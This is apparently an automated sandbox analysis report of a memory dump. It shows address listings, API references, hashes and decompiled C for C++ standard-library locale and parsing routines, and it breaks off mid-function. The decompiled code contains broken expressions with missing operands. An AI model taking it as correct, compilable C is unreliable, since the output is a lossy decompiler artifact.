                                            0x00307b00
                                            0x00307afb
                                            0x00307af1
                                            0x00307ae7
                                            0x00307a32
                                            0x00307a32
                                            0x00307a37
                                            0x00307a3f
                                            0x00307a43
                                            0x00000000
                                            0x00307a48
                                            0x00307a0b
                                            0x00307a10
                                            0x00307a1d
                                            0x00307a1d
                                            0x003079fd
                                            0x00307a00
                                            0x00000000
                                            0x00307a00
                                            0x003079fb
                                            0x003079f1
                                            0x003079e7
                                            0x00000000

                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030798E
                                              • Part of subcall function 003099F7: __lock.LIBCMT ref: 00309A08
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003079AA
                                            • std::_Facet_Register.LIBCPMT ref: 00307A43
                                            • std::bad_exception::bad_exception.LIBCMT ref: 00307A64
                                              • Part of subcall function 0030D31B: std::exception::exception.LIBCMT ref: 0030D325
                                            • __CxxThrowException@8.LIBCMT ref: 00307A72
                                              • Part of subcall function 0030F4FA: RaiseException.KERNEL32(?,?,?,00301B23,00000050,00000050,?,?,?,?,?,00301B23,00000000,00000000), ref: 0030F54F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: std::_$LockitLockit::_$ExceptionException@8Facet_RaiseRegisterThrow__lockstd::bad_exception::bad_exceptionstd::exception::exception
                                            • String ID: bad cast
                                            • API String ID: 3247575091-3145022300
                                            • Opcode ID: 501115873006fc4ab2cade405caf755569c3598f24d97e15eab3caffbd92cddd
                                            • Instruction ID: 1d50b9c7c6f8047f2ba1907ce3195b1f0fb7a84fb0c1c06d749f681e62d31478
                                            • Opcode Fuzzy Hash: 501115873006fc4ab2cade405caf755569c3598f24d97e15eab3caffbd92cddd
                                            • Instruction Fuzzy Hash: 6B31C832E061149BCB13DF98D8A1A9DF7B8EF54320F1181AAEC455B692DB31BE45CBC0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00307A80, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E00307A80(intOrPtr* _a4, intOrPtr* _a8) {
				signed int* _v0;
				signed int* _v4;
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v32;
				intOrPtr _v48;
				char _v56;
				intOrPtr* _v64;
				intOrPtr _v68;
				intOrPtr _v88;
				signed int _v92;
				char _v108;
				intOrPtr* _v112;
				intOrPtr _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				char _v129;
				signed int _v132;
				void* _t150;
				intOrPtr _t166;
				intOrPtr* _t169;
				intOrPtr _t170;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				intOrPtr _t178;
				signed int _t183;
				signed int _t187;
				signed int _t191;
				signed int _t196;
				signed int _t200;
				signed int _t204;
				intOrPtr _t209;
				void* _t214;
				signed int _t219;
				signed int _t220;
				void* _t225;
				signed int _t230;
				signed int _t231;
				char _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				signed int* _t235;
				intOrPtr _t236;
				intOrPtr _t239;
				signed int _t244;
				intOrPtr* _t247;
				signed int _t249;
				intOrPtr* _t250;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t259;
				signed int _t260;
				intOrPtr _t261;
				void* _t270;
				intOrPtr _t271;
				signed int _t272;
				intOrPtr* _t275;
				signed char* _t276;
				signed char* _t277;
				signed char* _t278;
				signed char* _t281;
				signed char* _t282;
				signed char* _t283;
				signed int _t286;
				signed int _t287;
				signed int* _t288;
				intOrPtr* _t289;
				intOrPtr* _t290;
				void* _t291;
				void* _t295;
				void* _t297;
				void* _t298;

				E003099F7( &_v16, 0);
				_t286 =  *0x333a64;
				_t232 =  *0x333a58;
				_v8 = _t232;
				if(_t286 == 0) {
					E003099F7( &_v12, _t286);
					if( *0x333a64 == _t286) {
						_t230 =  *0x331924; // 0x0
						_t231 = _t230 + 1;
						 *0x331924 = _t231;
						 *0x333a64 = _t231;
					}
					E00309A52( &_v12);
					_t286 =  *0x333a64;
				}
				_t239 =  *_a4;
				if(_t286 >=  *((intOrPtr*)(_t239 + 0xc))) {
					_t289 = 0;
					goto L8;
				} else {
					_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + _t286 * 4));
					if(_t289 != 0) {
						L16:
						E00309A52( &_v16);
						return _t289;
					} else {
						L8:
						if( *((char*)(_t239 + 0x14)) == 0) {
							L11:
							if(_t289 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t225 = E0030866D();
							if(_t286 >=  *((intOrPtr*)(_t225 + 0xc))) {
								L12:
								if(_t232 == 0) {
									_t150 = E003080F0(_t270,  &_v8, _a4);
									_t298 = _t297 + 8;
									if(_t150 == 0xffffffff) {
										E0030D31B( &_v28, "bad cast");
										E0030F4FA( &_v28, 0x32d290);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t295 = _t298;
										_push(_t232);
										_push(_t289);
										_push(_t286);
										E003099F7( &_v56, 0);
										_t287 =  *0x333a60;
										_t233 =  *0x333a50;
										_v48 = _t233;
										if(_t287 == 0) {
											E003099F7( &_v16, _t287);
											if( *0x333a60 == _t287) {
												_t219 =  *0x331924; // 0x0
												_t220 = _t219 + 1;
												 *0x331924 = _t220;
												 *0x333a60 = _t220;
											}
											E00309A52( &_v16);
											_t287 =  *0x333a60;
										}
										_t244 =  *_v0;
										if(_t287 >=  *((intOrPtr*)(_t244 + 0xc))) {
											_t290 = 0;
											goto L26;
										} else {
											_t290 =  *((intOrPtr*)( *((intOrPtr*)(_t244 + 8)) + _t287 * 4));
											if(_t290 != 0) {
												L34:
												E00309A52( &_v20);
												return _t290;
											} else {
												L26:
												if( *((char*)(_t244 + 0x14)) == 0) {
													L29:
													if(_t290 != 0) {
														goto L34;
													} else {
														goto L30;
													}
												} else {
													_t214 = E0030866D();
													if(_t287 >=  *((intOrPtr*)(_t214 + 0xc))) {
														L30:
														if(_t233 == 0) {
															if(E00308170(_t270,  &_v12, _v0) == 0xffffffff) {
																E0030D31B( &_v32, "bad cast");
																E0030F4FA( &_v32, 0x32d290);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t295);
																_t247 = _v64;
																_t271 =  *_t247;
																_push(_t233);
																_t234 = _v68;
																_push(_t290);
																_push(_t287);
																if(_t271 != 0) {
																	_t209 = _t271;
																	do {
																		if(_t209 == _t271) {
																			_t234 = _t234 + 1;
																		}
																		_t209 =  *((intOrPtr*)(_t247 + 1));
																		_t247 = _t247 + 1;
																	} while (_t209 != 0);
																}
																_v116 = _t234;
																_v88 = 0xf;
																_v92 = 0;
																_v108 = 0;
																E003060B0( &_v108, _t234, 0);
																_t235 = _v0;
																_t249 = 0xfffffffe;
																_t288 = _v4;
																_v132 = 1;
																while(1) {
																	_t272 = 0;
																	_v128 = _t249;
																	_t291 = 0;
																	_v129 = 0;
																	_v120 = 0;
																	if(_v116 <= 0) {
																		break;
																	} else {
																		goto L43;
																	}
																	do {
																		L43:
																		_t250 = _a8;
																		_t166 =  *((intOrPtr*)(_t291 + _t250));
																		if(_t166 != 0) {
																			_t261 =  *_t250;
																			_t236 = _a8;
																			while(_t166 != _t261) {
																				_t166 =  *((intOrPtr*)(_t291 + _t236 + 1));
																				_t291 = _t291 + 1;
																				if(_t166 != 0) {
																					continue;
																				}
																				break;
																			}
																			_t235 = _v0;
																			_t250 = _a8;
																		}
																		_t168 =  >=  ? _v108 :  &_v108;
																		if( *((char*)(( >=  ? _v108 :  &_v108) + _t272)) == 0) {
																			_t291 = _t291 + _v124;
																			_t169 = _t291 + _t250;
																			_v112 = _t169;
																			_t170 =  *_t169;
																			if(_t170 ==  *_t250 || _t170 == 0) {
																				_t274 =  >=  ? _v108 :  &_v108;
																				_t252 =  <  ? _v124 & 0x000000ff : 0x7f;
																				_t173 = _v120;
																				 *((char*)(( >=  ? _v108 :  &_v108) + _t173)) =  <  ? _v124 & 0x000000ff : 0x7f;
																				_t272 = _t173;
																				_t249 = _t272;
																				_v128 = _t249;
																				goto L89;
																			} else {
																				if(_t288[1] == 0) {
																					_t260 =  *_t288;
																					if(_t260 == 0) {
																						L60:
																						 *_t288 = 0;
																					} else {
																						_t283 =  *( *(_t260 + 0x1c));
																						if(_t283 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t260 + 0x2c)))) <= 0) {
																							_t204 =  *((intOrPtr*)( *_t260 + 0x18))();
																						} else {
																							_t204 =  *_t283 & 0x000000ff;
																						}
																						if(_t204 == 0xffffffff) {
																							goto L60;
																						} else {
																							_t288[1] = _t204;
																						}
																					}
																					_t288[1] = 1;
																				}
																				if(_t235[1] == 0) {
																					_t259 =  *_t235;
																					if(_t259 == 0) {
																						L70:
																						 *_t235 = 0;
																					} else {
																						_t282 =  *( *(_t259 + 0x1c));
																						if(_t282 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t259 + 0x2c)))) <= 0) {
																							_t200 =  *((intOrPtr*)( *_t259 + 0x18))();
																						} else {
																							_t200 =  *_t282 & 0x000000ff;
																						}
																						if(_t200 == 0xffffffff) {
																							goto L70;
																						} else {
																							_t235[1] = _t200;
																						}
																					}
																					_t235[1] = 1;
																				}
																				_t256 =  *_t288;
																				if(_t256 != 0) {
																					if( *_t235 != 0) {
																						goto L74;
																					} else {
																						goto L76;
																					}
																				} else {
																					if( *_t235 != _t256) {
																						L76:
																						if(_t288[1] == 0) {
																							if(_t256 == 0) {
																								L84:
																								 *_t288 = 0;
																							} else {
																								_t281 =  *( *(_t256 + 0x1c));
																								if(_t281 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t256 + 0x2c)))) <= 0) {
																									_t196 =  *((intOrPtr*)( *_t256 + 0x18))();
																								} else {
																									_t196 =  *_t281 & 0x000000ff;
																								}
																								if(_t196 == 0xffffffff) {
																									goto L84;
																								} else {
																									_t288[1] = _t196;
																								}
																							}
																							_t288[1] = 1;
																						}
																						if( *_v112 != _t288[1]) {
																							goto L74;
																						} else {
																							_t272 = _v120;
																							_t174 = 1;
																							_t249 = _v128;
																							_v129 = 1;
																						}
																					} else {
																						L74:
																						_t280 =  >=  ? _v108 :  &_v108;
																						_t258 =  <  ? _v124 & 0x000000ff : 0x7f;
																						_t191 = _v120;
																						 *((char*)(( >=  ? _v108 :  &_v108) + _t191)) =  <  ? _v124 & 0x000000ff : 0x7f;
																						_t272 = _t191;
																						_t249 = _v128;
																						goto L89;
																					}
																				}
																			}
																		} else {
																			_t249 = _v128;
																			_t207 =  >=  ? _v108 :  &_v108;
																			_t291 = _t291 +  *((char*)(( >=  ? _v108 :  &_v108) + _t272));
																			L89:
																			_t174 = _v129;
																		}
																		_t272 = _t272 + 1;
																		_v120 = _t272;
																	} while (_t272 < _v116);
																	if(_t174 != 0) {
																		if(_t288[1] == 0) {
																			_t255 =  *_t288;
																			if(_t255 == 0) {
																				L100:
																				 *_t288 = 0;
																			} else {
																				_t278 =  *( *(_t255 + 0x1c));
																				if(_t278 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x2c)))) <= 0) {
																					_t187 =  *((intOrPtr*)( *_t255 + 0x18))();
																				} else {
																					_t187 =  *_t278 & 0x000000ff;
																				}
																				if(_t187 == 0xffffffff) {
																					goto L100;
																				} else {
																					_t288[1] = _t187;
																				}
																			}
																			_t288[1] = 1;
																		}
																		if(_t235[1] == 0) {
																			_t254 =  *_t235;
																			if(_t254 == 0) {
																				L110:
																				 *_t235 = 0;
																			} else {
																				_t277 =  *( *(_t254 + 0x1c));
																				if(_t277 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t254 + 0x2c)))) <= 0) {
																					_t183 =  *((intOrPtr*)( *_t254 + 0x18))();
																				} else {
																					_t183 =  *_t277 & 0x000000ff;
																				}
																				if(_t183 == 0xffffffff) {
																					goto L110;
																				} else {
																					_t235[1] = _t183;
																				}
																			}
																			_t235[1] = 1;
																		}
																		_t253 =  *_t288;
																		if(_t253 != 0) {
																			if( *_t235 != 0) {
																				goto L114;
																			} else {
																				goto L118;
																			}
																		} else {
																			if( *_t235 != _t253) {
																				L118:
																				_v124 = _v124 + 1;
																				if(_t253 == 0) {
																					L125:
																					 *_t288 = 0;
																					_t249 = _t253 | 0xffffffff;
																					_t288[1] = 1;
																					continue;
																				} else {
																					if( *( *(_t253 + 0x1c)) == 0) {
																						L122:
																						_t177 = ( *_t253)[0x1c]();
																					} else {
																						_t275 =  *((intOrPtr*)(_t253 + 0x2c));
																						_t178 =  *_t275;
																						if(_t178 <= 0) {
																							goto L122;
																						} else {
																							 *_t275 = _t178 - 1;
																							_t253 =  *(_t253 + 0x1c);
																							_t276 =  *_t253;
																							 *_t253 =  &(_t276[1]);
																							_t177 =  *_t276 & 0x000000ff;
																						}
																					}
																					if(_t177 == 0xffffffff) {
																						goto L125;
																					} else {
																						_t288[1] = 0;
																						_t249 = _t253 | 0xffffffff;
																						continue;
																					}
																				}
																				goto L127;
																			} else {
																				L114:
																				_t249 = _v128;
																			}
																		}
																	}
																	break;
																}
																if(_v88 < 0x10) {
																	return _t249;
																} else {
																	L0030DF6A(_v108);
																	return _v128;
																}
															} else {
																_t290 = _v12;
																 *0x333a50 = _t290;
																 *((intOrPtr*)( *_t290 + 4))();
																E00308645(_t290);
																goto L34;
															}
														} else {
															E00309A52( &_v20);
															return _t233;
														}
													} else {
														_t290 =  *((intOrPtr*)( *((intOrPtr*)(_t214 + 8)) + _t287 * 4));
														goto L29;
													}
												}
											}
										}
									} else {
										_t289 = _v8;
										 *0x333a58 = _t289;
										 *((intOrPtr*)( *_t289 + 4))();
										E00308645(_t289);
										goto L16;
									}
								} else {
									E00309A52( &_v16);
									return _t232;
								}
							} else {
								_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t225 + 8)) + _t286 * 4));
								goto L11;
							}
						}
					}
				}
				L127:
			}


















































































                                            0x00307a8e
                                            0x00307a93
                                            0x00307a99
                                            0x00307a9f
                                            0x00307aa4
                                            0x00307aaa
                                            0x00307ab5
                                            0x00307ab7
                                            0x00307abc
                                            0x00307abd
                                            0x00307ac2
                                            0x00307ac2
                                            0x00307aca
                                            0x00307acf
                                            0x00307acf
                                            0x00307ad8
                                            0x00307add
                                            0x00307aeb
                                            0x00000000
                                            0x00307adf
                                            0x00307ae2
                                            0x00307ae7
                                            0x00307b4b
                                            0x00307b4e
                                            0x00307b5b
                                            0x00307ae9
                                            0x00307aed
                                            0x00307af1
                                            0x00307b03
                                            0x00307b05
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307af3
                                            0x00307af3
                                            0x00307afb
                                            0x00307b07
                                            0x00307b09
                                            0x00307b25
                                            0x00307b2a
                                            0x00307b30
                                            0x00307b64
                                            0x00307b72
                                            0x00307b77
                                            0x00307b78
                                            0x00307b79
                                            0x00307b7a
                                            0x00307b7b
                                            0x00307b7c
                                            0x00307b7d
                                            0x00307b7e
                                            0x00307b7f
                                            0x00307b81
                                            0x00307b86
                                            0x00307b87
                                            0x00307b88
                                            0x00307b8e
                                            0x00307b93
                                            0x00307b99
                                            0x00307b9f
                                            0x00307ba4
                                            0x00307baa
                                            0x00307bb5
                                            0x00307bb7
                                            0x00307bbc
                                            0x00307bbd
                                            0x00307bc2
                                            0x00307bc2
                                            0x00307bca
                                            0x00307bcf
                                            0x00307bcf
                                            0x00307bd8
                                            0x00307bdd
                                            0x00307beb
                                            0x00000000
                                            0x00307bdf
                                            0x00307be2
                                            0x00307be7
                                            0x00307c4b
                                            0x00307c4e
                                            0x00307c5b
                                            0x00307be9
                                            0x00307bed
                                            0x00307bf1
                                            0x00307c03
                                            0x00307c05
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307bf3
                                            0x00307bf3
                                            0x00307bfb
                                            0x00307c07
                                            0x00307c09
                                            0x00307c30
                                            0x00307c64
                                            0x00307c72
                                            0x00307c77
                                            0x00307c78
                                            0x00307c79
                                            0x00307c7a
                                            0x00307c7b
                                            0x00307c7c
                                            0x00307c7d
                                            0x00307c7e
                                            0x00307c7f
                                            0x00307c80
                                            0x00307c86
                                            0x00307c8c
                                            0x00307c8e
                                            0x00307c8f
                                            0x00307c92
                                            0x00307c93
                                            0x00307c96
                                            0x00307c98
                                            0x00307ca0
                                            0x00307ca2
                                            0x00307ca4
                                            0x00307ca4
                                            0x00307ca5
                                            0x00307ca8
                                            0x00307ca9
                                            0x00307ca0
                                            0x00307cb4
                                            0x00307cb8
                                            0x00307cc0
                                            0x00307cc8
                                            0x00307ccd
                                            0x00307cd2
                                            0x00307cd5
                                            0x00307cda
                                            0x00307cdd
                                            0x00307ce5
                                            0x00307ce5
                                            0x00307ce7
                                            0x00307ceb
                                            0x00307ced
                                            0x00307cf2
                                            0x00307cfa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307d00
                                            0x00307d00
                                            0x00307d00
                                            0x00307d03
                                            0x00307d08
                                            0x00307d0a
                                            0x00307d0c
                                            0x00307d10
                                            0x00307d14
                                            0x00307d18
                                            0x00307d1b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307d1b
                                            0x00307d1d
                                            0x00307d20
                                            0x00307d20
                                            0x00307d2c
                                            0x00307d35
                                            0x00307d54
                                            0x00307d58
                                            0x00307d5b
                                            0x00307d5f
                                            0x00307d63
                                            0x00307e8f
                                            0x00307e9b
                                            0x00307e9e
                                            0x00307ea2
                                            0x00307ea5
                                            0x00307ea7
                                            0x00307ea9
                                            0x00000000
                                            0x00307d71
                                            0x00307d75
                                            0x00307d77
                                            0x00307d7b
                                            0x00307da2
                                            0x00307da2
                                            0x00307d7d
                                            0x00307d80
                                            0x00307d84
                                            0x00307d95
                                            0x00307d8e
                                            0x00307d8e
                                            0x00307d8e
                                            0x00307d9b
                                            0x00000000
                                            0x00307d9d
                                            0x00307d9d
                                            0x00307d9d
                                            0x00307d9b
                                            0x00307da8
                                            0x00307da8
                                            0x00307db0
                                            0x00307db2
                                            0x00307db6
                                            0x00307ddd
                                            0x00307ddd
                                            0x00307db8
                                            0x00307dbb
                                            0x00307dbf
                                            0x00307dd0
                                            0x00307dc9
                                            0x00307dc9
                                            0x00307dc9
                                            0x00307dd6
                                            0x00000000
                                            0x00307dd8
                                            0x00307dd8
                                            0x00307dd8
                                            0x00307dd6
                                            0x00307de3
                                            0x00307de3
                                            0x00307de7
                                            0x00307deb
                                            0x00307e27
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307ded
                                            0x00307def
                                            0x00307e29
                                            0x00307e2d
                                            0x00307e31
                                            0x00307e58
                                            0x00307e58
                                            0x00307e33
                                            0x00307e36
                                            0x00307e3a
                                            0x00307e4b
                                            0x00307e44
                                            0x00307e44
                                            0x00307e44
                                            0x00307e51
                                            0x00000000
                                            0x00307e53
                                            0x00307e53
                                            0x00307e53
                                            0x00307e51
                                            0x00307e5e
                                            0x00307e5e
                                            0x00307e6b
                                            0x00000000
                                            0x00307e6d
                                            0x00307e6d
                                            0x00307e71
                                            0x00307e73
                                            0x00307e77
                                            0x00307e77
                                            0x00307df1
                                            0x00307df1
                                            0x00307e03
                                            0x00307e0f
                                            0x00307e12
                                            0x00307e16
                                            0x00307e19
                                            0x00307e1b
                                            0x00000000
                                            0x00307e1b
                                            0x00307def
                                            0x00307deb
                                            0x00307d37
                                            0x00307d40
                                            0x00307d44
                                            0x00307d4d
                                            0x00307ead
                                            0x00307ead
                                            0x00307ead
                                            0x00307eb1
                                            0x00307eb2
                                            0x00307eb6
                                            0x00307ec2
                                            0x00307ecc
                                            0x00307ece
                                            0x00307ed2
                                            0x00307ef9
                                            0x00307ef9
                                            0x00307ed4
                                            0x00307ed7
                                            0x00307edb
                                            0x00307eec
                                            0x00307ee5
                                            0x00307ee5
                                            0x00307ee5
                                            0x00307ef2
                                            0x00000000
                                            0x00307ef4
                                            0x00307ef4
                                            0x00307ef4
                                            0x00307ef2
                                            0x00307eff
                                            0x00307eff
                                            0x00307f07
                                            0x00307f09
                                            0x00307f0d
                                            0x00307f34
                                            0x00307f34
                                            0x00307f0f
                                            0x00307f12
                                            0x00307f16
                                            0x00307f27
                                            0x00307f20
                                            0x00307f20
                                            0x00307f20
                                            0x00307f2d
                                            0x00000000
                                            0x00307f2f
                                            0x00307f2f
                                            0x00307f2f
                                            0x00307f2d
                                            0x00307f3a
                                            0x00307f3a
                                            0x00307f3e
                                            0x00307f42
                                            0x00307f6d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307f44
                                            0x00307f46
                                            0x00307f6f
                                            0x00307f6f
                                            0x00307f75
                                            0x00307fb0
                                            0x00307fb0
                                            0x00307fb6
                                            0x00307fb9
                                            0x00000000
                                            0x00307f77
                                            0x00307f7d
                                            0x00307f9a
                                            0x00307f9c
                                            0x00307f7f
                                            0x00307f7f
                                            0x00307f82
                                            0x00307f86
                                            0x00000000
                                            0x00307f88
                                            0x00307f89
                                            0x00307f8b
                                            0x00307f8e
                                            0x00307f93
                                            0x00307f95
                                            0x00307f95
                                            0x00307f86
                                            0x00307fa2
                                            0x00000000
                                            0x00307fa4
                                            0x00307fa4
                                            0x00307fa8
                                            0x00000000
                                            0x00307fa8
                                            0x00307fa2
                                            0x00000000
                                            0x00307f48
                                            0x00307f48
                                            0x00307f48
                                            0x00307f48
                                            0x00307f46
                                            0x00307f42
                                            0x00000000
                                            0x00307ec2
                                            0x00307f51
                                            0x00307fca
                                            0x00307f53
                                            0x00307f57
                                            0x00307f69
                                            0x00307f69
                                            0x00307c32
                                            0x00307c32
                                            0x00307c37
                                            0x00307c3f
                                            0x00307c43
                                            0x00000000
                                            0x00307c48
                                            0x00307c0b
                                            0x00307c10
                                            0x00307c1d
                                            0x00307c1d
                                            0x00307bfd
                                            0x00307c00
                                            0x00000000
                                            0x00307c00
                                            0x00307bfb
                                            0x00307bf1
                                            0x00307be7
                                            0x00307b32
                                            0x00307b32
                                            0x00307b37
                                            0x00307b3f
                                            0x00307b43
                                            0x00000000
                                            0x00307b48
                                            0x00307b0b
                                            0x00307b10
                                            0x00307b1d
                                            0x00307b1d
                                            0x00307afd
                                            0x00307b00
                                            0x00000000
                                            0x00307b00
                                            0x00307afb
                                            0x00307af1
                                            0x00307ae7
                                            0x00000000

                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00307A8E
                                              • Part of subcall function 003099F7: __lock.LIBCMT ref: 00309A08
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00307AAA
                                            • std::_Facet_Register.LIBCPMT ref: 00307B43
                                            • std::bad_exception::bad_exception.LIBCMT ref: 00307B64
                                              • Part of subcall function 0030D31B: std::exception::exception.LIBCMT ref: 0030D325
                                            • __CxxThrowException@8.LIBCMT ref: 00307B72
                                              • Part of subcall function 0030F4FA: RaiseException.KERNEL32(?,?,?,00301B23,00000050,00000050,?,?,?,?,?,00301B23,00000000,00000000), ref: 0030F54F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: std::_$LockitLockit::_$ExceptionException@8Facet_RaiseRegisterThrow__lockstd::bad_exception::bad_exceptionstd::exception::exception
                                            • String ID: bad cast
                                            • API String ID: 3247575091-3145022300
                                            • Opcode ID: c86bfea167617ff01971f26d439e1e290432c43a7ca0737c51a263f14249385a
                                            • Instruction ID: 548240b32e6e219c4c9e2ac9f3571a8dbb1388a0d580268c12c8d827ce39a94e
                                            • Opcode Fuzzy Hash: c86bfea167617ff01971f26d439e1e290432c43a7ca0737c51a263f14249385a
                                            • Instruction Fuzzy Hash: BA31C531E062189BCB13DF98D8E1A9DF7B8EF54320F1541A9E8459B692DB31BE45CBC0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00307B80, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E00307B80(signed int* _a4, intOrPtr* _a12) {
				signed int* _v0;
				void* _v8;
				char _v12;
				char _v16;
				intOrPtr* _v24;
				char _v28;
				intOrPtr _v48;
				signed int _v52;
				char _v68;
				intOrPtr* _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				char _v89;
				signed int _v92;
				intOrPtr _t136;
				intOrPtr* _t139;
				intOrPtr _t140;
				signed int _t143;
				signed int _t144;
				signed int _t147;
				intOrPtr _t148;
				signed int _t153;
				signed int _t157;
				signed int _t161;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				intOrPtr _t179;
				void* _t184;
				signed int _t189;
				signed int _t190;
				char _t191;
				intOrPtr _t192;
				signed int* _t193;
				intOrPtr _t194;
				signed int _t197;
				intOrPtr* _t200;
				signed int _t202;
				intOrPtr* _t203;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t212;
				signed int _t213;
				intOrPtr _t214;
				void* _t219;
				intOrPtr _t220;
				signed int _t221;
				intOrPtr* _t224;
				signed char* _t225;
				signed char* _t226;
				signed char* _t227;
				signed char* _t230;
				signed char* _t231;
				signed char* _t232;
				signed int _t234;
				signed int* _t235;
				intOrPtr* _t236;
				void* _t237;

				E003099F7( &_v16, 0);
				_t234 =  *0x333a60;
				_t191 =  *0x333a50;
				_v8 = _t191;
				if(_t234 == 0) {
					E003099F7( &_v12, _t234);
					if( *0x333a60 == _t234) {
						_t189 =  *0x331924; // 0x0
						_t190 = _t189 + 1;
						 *0x331924 = _t190;
						 *0x333a60 = _t190;
					}
					E00309A52( &_v12);
					_t234 =  *0x333a60;
				}
				_t197 =  *_a4;
				if(_t234 >=  *((intOrPtr*)(_t197 + 0xc))) {
					_t236 = 0;
					goto L8;
				} else {
					_t236 =  *((intOrPtr*)( *((intOrPtr*)(_t197 + 8)) + _t234 * 4));
					if(_t236 != 0) {
						L16:
						E00309A52( &_v16);
						return _t236;
					} else {
						L8:
						if( *((char*)(_t197 + 0x14)) == 0) {
							L11:
							if(_t236 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t184 = E0030866D();
							if(_t234 >=  *((intOrPtr*)(_t184 + 0xc))) {
								L12:
								if(_t191 == 0) {
									if(E00308170(_t219,  &_v8, _a4) == 0xffffffff) {
										E0030D31B( &_v28, "bad cast");
										E0030F4FA( &_v28, 0x32d290);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t200 = _v24;
										_t220 =  *_t200;
										_push(_t191);
										_t192 = _v28;
										_push(_t236);
										_push(_t234);
										if(_t220 != 0) {
											_t179 = _t220;
											do {
												if(_t179 == _t220) {
													_t192 = _t192 + 1;
												}
												_t179 =  *((intOrPtr*)(_t200 + 1));
												_t200 = _t200 + 1;
											} while (_t179 != 0);
										}
										_v76 = _t192;
										_v48 = 0xf;
										_v52 = 0;
										_v68 = 0;
										E003060B0( &_v68, _t192, 0);
										_t193 = _a4;
										_t202 = 0xfffffffe;
										_t235 = _v0;
										_v92 = 1;
										while(1) {
											_t221 = 0;
											_v88 = _t202;
											_t237 = 0;
											_v89 = 0;
											_v80 = 0;
											if(_v76 <= 0) {
												break;
											} else {
												goto L25;
											}
											do {
												L25:
												_t203 = _a12;
												_t136 =  *((intOrPtr*)(_t237 + _t203));
												if(_t136 != 0) {
													_t214 =  *_t203;
													_t194 = _a12;
													while(_t136 != _t214) {
														_t136 =  *((intOrPtr*)(_t237 + _t194 + 1));
														_t237 = _t237 + 1;
														if(_t136 != 0) {
															continue;
														}
														break;
													}
													_t193 = _a4;
													_t203 = _a12;
												}
												_t138 =  >=  ? _v68 :  &_v68;
												if( *((char*)(( >=  ? _v68 :  &_v68) + _t221)) == 0) {
													_t237 = _t237 + _v84;
													_t139 = _t237 + _t203;
													_v72 = _t139;
													_t140 =  *_t139;
													if(_t140 ==  *_t203 || _t140 == 0) {
														_t223 =  >=  ? _v68 :  &_v68;
														_t205 =  <  ? _v84 & 0x000000ff : 0x7f;
														_t143 = _v80;
														 *((char*)(( >=  ? _v68 :  &_v68) + _t143)) =  <  ? _v84 & 0x000000ff : 0x7f;
														_t221 = _t143;
														_t202 = _t221;
														_v88 = _t202;
														goto L71;
													} else {
														if(_t235[1] == 0) {
															_t213 =  *_t235;
															if(_t213 == 0) {
																L42:
																 *_t235 = 0;
															} else {
																_t232 =  *( *(_t213 + 0x1c));
																if(_t232 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x2c)))) <= 0) {
																	_t174 =  *((intOrPtr*)( *_t213 + 0x18))();
																} else {
																	_t174 =  *_t232 & 0x000000ff;
